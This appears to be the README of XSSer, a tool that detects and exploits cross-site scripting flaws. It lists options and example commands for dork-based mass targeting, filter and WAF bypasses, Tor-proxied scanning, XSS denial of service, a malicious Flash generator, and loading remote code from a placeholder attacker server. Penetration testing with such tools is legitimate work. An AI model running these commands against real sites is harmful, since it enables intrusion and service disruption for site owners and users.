README 15 KB

123456789101112131415161718192021222324252627282930313233343536373839404142434445464748495051525354555657585960616263646566676869707172737475767778798081828384858687888990919293949596979899100101102103104105106107108109110111112113114115116117118119120121122123124125126127128129130131132133134135136137138139140141142143144145146147148149150151152153154155156157158159160161162163164165166167168169170171172173174175176177178179180181182183184185186187188189190191192193194195196197198199200201202203204205206207208209210211212213214215216217218219220221222223224225226227228229230231232233234235236237238239240241242243244245246247248249250251252253254255256257258259260261262263264265266267268269270271272273274275276277278279280281282283284285286287288289290291292293294295296297298299300301302303304305306307308309310311312313314315316317318319320321322323324325326327328329330331332333334335336337338339340341342343344345346347348349350351352
  1. ================================================================
  2. Introduction:
  3. ==============================
  4. Cross Site "Scripter" is an automatic -framework- to detect, exploit and report XSS vulnerabilities in web-based applications.
  5. ================================================================
  6. Current Version:
  7. ==============================
  8. XSSer v1.8[2]: "The Hiv3!" (2010/2019) // [https://xsser.03c8.net]
  9. ================================================================
  10. Options and features:
  11. ==============================
  12. Usage:
  13. xsser [OPTIONS] [--all <url> |-u <url> |-i <file> |-d <dork> (options)|-l ] [-g <get> |-p <post> |-c <crawl> (options)]
  14. [Request(s)] [Checker(s)] [Vector(s)] [Anti-antiXSS/IDS] [Bypasser(s)] [Technique(s)] [Final Injection(s)] [Reporting] {Miscellaneous}
  15. Cross Site "Scripter" is an automatic -framework- to detect, exploit and
  16. report XSS vulnerabilities in web-based applications.
  17. Options:
  18. --version show program's version number and exit
  19. -h, --help show this help message and exit
  20. -s, --statistics show advanced statistics output results
  21. -v, --verbose active verbose mode output results
  22. --gtk launch XSSer GTK Interface
  23. --wizard start Wizard Helper!
  24. *Special Features*:
  25. You can set Vector(s) and Bypasser(s) to build complex scripts for XSS
  26. code embedded. XST allows you to discover if target is vulnerable to
  27. 'Cross Site Tracing' [CAPEC-107]:
  28. --imx=IMX IMX - Create an image with XSS (--imx image.png)
  29. --fla=FLASH FLA - Create a flash movie with XSS (--fla movie.swf)
  30. --xst=XST XST - Cross Site Tracing (--xst http(s)://host.com)
  31. *Select Target(s)*:
  32. At least one of these options must to be specified to set the source
  33. to get target(s) urls from:
  34. --all=TARGET Automatically audit an entire target
  35. -u URL, --url=URL Enter target to audit
  36. -i READFILE Read target(s) urls from file
  37. -d DORK Search target(s) using a query (ex: 'news.php?id=')
  38. -l Search from a list of 'dorks'
  39. --De=DORK_ENGINE Use this search engine (default: yahoo)
  40. --Da Search massively using all search engines
  41. *Select type of HTTP/HTTPS Connection(s)*:
  42. These options can be used to specify which parameter(s) we want to use
  43. as payload(s). Set 'XSS' as keyword on the place(s) that you want to
  44. inject:
  45. -g GETDATA Send payload using GET (ex: '/menu.php?id=XSS')
  46. -p POSTDATA Send payload using POST (ex: 'foo=1&bar=XSS')
  47. -c CRAWLING Number of urls to crawl on target(s): 1-99999
  48. --Cw=CRAWLER_WIDTH Deeping level of crawler: 1-5 (default: 2)
  49. --Cl Crawl only local target(s) urls (default: FALSE)
  50. *Configure Request(s)*:
  51. These options can be used to specify how to connect to the target(s)
  52. payload(s). You can choose multiple:
  53. --head Send a HEAD request before start a test
  54. --cookie=COOKIE Change your HTTP Cookie header
  55. --drop-cookie Ignore Set-Cookie header from response
  56. --user-agent=AGENT Change your HTTP User-Agent header (default: SPOOFED)
  57. --referer=REFERER Use another HTTP Referer header (default: NONE)
  58. --xforw Set your HTTP X-Forwarded-For with random IP values
  59. --xclient Set your HTTP X-Client-IP with random IP values
  60. --headers=HEADERS Extra HTTP headers newline separated
  61. --auth-type=ATYPE HTTP Authentication type (Basic, Digest, GSS or NTLM)
  62. --auth-cred=ACRED HTTP Authentication credentials (name:password)
  63. --check-tor Check to see if Tor is used properly
  64. --proxy=PROXY Use proxy server (tor: http://localhost:8118)
  65. --ignore-proxy Ignore system default HTTP proxy
  66. --timeout=TIMEOUT Select your timeout (default: 30)
  67. --retries=RETRIES Retries when connection timeout (default: 1)
  68. --threads=THREADS Maximum number of concurrent requests (default: 5)
  69. --delay=DELAY Delay in seconds between each request (default: 0)
  70. --tcp-nodelay Use the TCP_NODELAY option
  71. --follow-redirects Follow server redirection responses (302)
  72. --follow-limit=FLI Set limit for redirection requests (default: 50)
  73. *Checker Systems*:
  74. These options are useful to know if your target is using filters
  75. against XSS attacks:
  76. --hash Send a hash to check if target is repeating content
  77. --heuristic Discover parameters filtered by using heuristics
  78. --discode=DISCODE Set code on reply to discard an injection
  79. --checkaturl=ALT Check reply using: <alternative url> [aka BLIND-XSS]
  80. --checkmethod=ALTM Check reply using: GET or POST (default: GET)
  81. --checkatdata=ALD Check reply using: <alternative payload>
  82. --reverse-check Establish a reverse connection from target to XSSer
  83. --reverse-open Open a web browser when a reverse check is established
  84. *Select Vector(s)*:
  85. These options can be used to specify injection(s) code. Important if
  86. you don't want to inject a common XSS vector used by default. Choose
  87. only one option:
  88. --payload=SCRIPT OWN - Inject your own code
  89. --auto AUTO - Inject a list of vectors provided by XSSer
  90. *Select Payload(s)*:
  91. These options can be used to set the list of vectors provided by
  92. XSSer. Choose only if required:
  93. --auto-set=FZZ_NUM ASET - Limit of vectors to inject (default: 1293)
  94. --auto-info AINFO - Select ONLY vectors with INFO (default: FALSE)
  95. --auto-random ARAND - Set random to order (default: FALSE)
  96. *Anti-antiXSS Firewall rules*:
  97. These options can be used to try to bypass specific WAF/IDS products
  98. and some anti-XSS browser filters. Choose only if required:
  99. --Phpids0.6.5 PHPIDS (0.6.5) [ALL]
  100. --Phpids0.7 PHPIDS (0.7) [ALL]
  101. --Imperva Imperva Incapsula [ALL]
  102. --Webknight WebKnight (4.1) [Chrome]
  103. --F5bigip F5 Big IP [Chrome + FF + Opera]
  104. --Barracuda Barracuda WAF [ALL]
  105. --Modsec Mod-Security [ALL]
  106. --Quickdefense QuickDefense [Chrome]
  107. --Sucuri SucuriWAF [ALL]
  108. --Firefox Firefox 12 [& below]
  109. --Chrome Chrome 19 & Firefox 12 [& below]
  110. --Opera Opera 10.5 [& below]
  111. --Iexplorer IExplorer 9 & Firefox 12 [& below]
  112. *Select Bypasser(s)*:
  113. These options can be used to encode vector(s) and try to bypass
  114. possible anti-XSS filters. They can be combined with other techniques:
  115. --Str Use method String.FromCharCode()
  116. --Une Use Unescape() function
  117. --Mix Mix String.FromCharCode() and Unescape()
  118. --Dec Use Decimal encoding
  119. --Hex Use Hexadecimal encoding
  120. --Hes Use Hexadecimal encoding with semicolons
  121. --Dwo Encode IP addresses with DWORD
  122. --Doo Encode IP addresses with Octal
  123. --Cem=CEM Set different 'Character Encoding Mutations'
  124. (reversing obfuscators) (ex: 'Mix,Une,Str,Hex')
  125. *Special Technique(s)*:
  126. These options can be used to inject code using different XSS
  127. techniques and fuzzing vectors. You can choose multiple:
  128. --Coo COO - Cross Site Scripting Cookie injection
  129. --Xsa XSA - Cross Site Agent Scripting
  130. --Xsr XSR - Cross Site Referer Scripting
  131. --Dcp DCP - Data Control Protocol injections
  132. --Dom DOM - Document Object Model injections
  133. --Ind IND - HTTP Response Splitting Induced code
  134. *Select Final injection(s)*:
  135. These options can be used to specify the final code to inject on
  136. vulnerable target(s). Important if you want to exploit 'on-the-wild'
  137. the vulnerabilities found. Choose only one option:
  138. --Fp=FINALPAYLOAD OWN - Exploit your own code
  139. --Fr=FINALREMOTE REMOTE - Exploit a script -remotely-
  140. *Special Final injection(s)*:
  141. These options can be used to execute some 'special' injection(s) on
  142. vulnerable target(s). You can select multiple and combine them with
  143. your final code (except with DCP exploits):
  144. --Anchor ANC - Use 'Anchor Stealth' payloader (DOM shadows!)
  145. --B64 B64 - Base64 code encoding in META tag (rfc2397)
  146. --Onm ONM - Use onMouseMove() event
  147. --Ifr IFR - Use <iframe> source tag
  148. --Dos DOS - XSS (client) Denial of Service
  149. --Doss DOSs - XSS (server) Denial of Service
  150. *Reporting*:
  151. --save Export to file (XSSreport.raw)
  152. --xml=FILEXML Export to XML (--xml file.xml)
  153. *Miscellaneous*:
  154. --silent Inhibit console output results
  155. --alive=ISALIVE Set limit of errors before check if target is alive
  156. --update Check for latest stable version
  157. ================================================================
  158. Commands and examples:
  159. ==============================
  160. ---------------------------------------
  161. * View HELP (Available commands):
  162. xsser -h (--help)
  163. ----------------------------------------
  164. * Check for latest stable version:
  165. xsser --update
  166. ----------------------------------------
  167. * Launch GTK interface (GUI):
  168. xsser --gtk
  169. ----------------------------------------
  170. * Simple injection from URL:
  171. xsser -u "https://target.com/XSS"
  172. ----------------------------------------
  173. * Simple injection from File, with Tor proxy and spoofing HTTP Referer headers
  174. xsser -i "file.txt" --proxy "http://127.0.0.1:8118" --referer "127.0.0.1"
  175. ----------------------------------------
  176. * Multiple injections from URL, with automatic payloading, establishing a reverse connection and showing statistics:
  177. xsser -u "https:/target.com/XSS" --auto --reverse-check -s
  178. ----------------------------------------
  179. * Multiple injections from URL, with automatic payloading, using Tor proxy, using "Hexadecimal" encoding, with verbose output and saving results to file (XSSreport.raw):
  180. xsser -u "https://target.com/XSS" --auto --proxy "http://127.0.0.1:8118" --Hex --verbose --save
  181. ----------------------------------------
  182. * Multiple injections from URL, with automatic payloading, using character encoding mutations (first, changing payload to 'Hexadecimal'; second, changing to 'StringFromCharCode' the first one; third, reencoding to 'Hexadecimal' the second one), with HTTP User-Agent spoofed, changing timeout to "20" and using multithreads (5 threads):
  183. xsser -u "https://target.com/XSS" --auto --Cem "Hex,Str,Hex" --user-agent "XSSer Pentesting Tool" --timeout "20" --threads "5"
  184. ----------------------------------------
  185. * Advanced injection from File, payloading your -own- code and using Unescape() character encoding to bypass filters:
  186. xsser -i "urls.txt" --payload "<script>alert('XSSed');</script>" --Une
  187. ----------------------------------------
  188. * Injection from Dork, selecting "DuckDuckGo" as search engine:
  189. xsser --De "duck" -d "search.php?q="
  190. ----------------------------------------
  191. * Injection from a list of Dorks extracted from a file (provided by XSSer) and using all search engines supported (XSSer Storm!):
  192. xsser -l --Da
  193. ----------------------------------------
  194. * Injection from Crawler with deep 2 and 200 pages to review (XSSer Spider!):
  195. xsser -c 200 --Cw=2 -u "https://target.com"
  196. ----------------------------------------
  197. * Simple injection from URL, to a POST parameter (ex: password), with statistics results:
  198. xsser -u "https://target.com/login.php" -p "username=admin&password=XSS" -s
  199. ----------------------------------------
  200. * Multiple injections (with hex and int hashes) to multiple parameters on a single URLG and using GET:
  201. xsser -u "https://target.com" -g "login.php?=usernameXSS&password=XSS&captcha=X1S" --auto
  202. ----------------------------------------
  203. * Simple injection from URL, using GET, injecting on Cookie, trying to use DOM shadow space (no server logging!) and if exists any vulnerability, exploiting your -own- final code:
  204. xsser -u "https://target.com" -g "/news.asp?page=XSS" --Coo --Dom --Fp="<script>alert('XSSed');</script>"
  205. ----------------------------------------
  206. * Simple injection from URL, using GET and if exists any vulnerability, exploit a DoS (Denegation Of Service):
  207. xsser -u "https://target.com" -g "/news.asp?page=XSS" --Dos
  208. ----------------------------------------
  209. * Multiple injections to multiple places, extracting targets from a File, applying automatic payloading, changing timeout to "20" and using multithreads (5 threads), increasing delay between requests to 10 seconds, injecting parameters in HTTP USer-Agent, HTTP Referer and Cookies, using proxy Tor, with IP Octal obfuscation, with statistics results and using verbose mode (real player mode!):
  210. xsser -i "list_of_url_targets.txt" --auto --timeout "20" --threads "5" --delay "10" --Xsa --Xsr --Coo --proxy "http://127.0.0.1:8118" --Doo -s --verbose
  211. ----------------------------------------
  212. * Injection of a XSS code provided by user on a -fake- image (ready to be uploaded to your public profile):<br><br>
  213. xsser --Imx "test.png" --payload="<script>alert('XSSed');</script>"
  214. ----------------------------------------
  215. * Report dorking search (using all search engines) to a XML file:
  216. xsser -d "login.php" --Da --xml "security_report_XSSer_Dork_login-php_allengines.xml"
  217. ----------------------------------------
  218. * Create a malicious Flash movie :
  219. xsser --fla "INFECTED_movie.swf"
  220. ----------------------------------------
  221. * Send a pre-checking hash to search for false -false positives-:
  222. xsser -u "https://target.com" --hash
  223. ----------------------------------------
  224. * Discover parameters filtered on your target using heuristics:
  225. xsser -u "https://target.com" --heuristic
  226. ----------------------------------------
  227. * Exploiting Base64 code encoding in META tag (rfc2397), just after inject a manual payload:
  228. xsser -u "https://target.com" -g "/index.php?id=XSS" --payload="<script>alert('XSSed');</script>" --B64
  229. ----------------------------------------
  230. * Exploiting your "own" -remote code- after discover a vulnerability using automatic fuzzing:<br><br>
  231. xsser -u "https://target.com" -g "/index.php?id=XSS" --auto --Fr "https://attacker_server.net/exploits/XSS/code.js"</b><br>
  232. ----------------------------------------
  233. * Apply Anti-antiXSS bypassers (ex: Imperva) before to inject you -own- code with verbose output:
  234. xsser -u "https://target.com" -g "/index.php?id=XSS" --Imperva --payload="<script>alert('XSSed');</script>" -v
  235. ----------------------------------------
  236. * Search also "XSSer" on the Internet for more videos and tutorials...
  237. [...]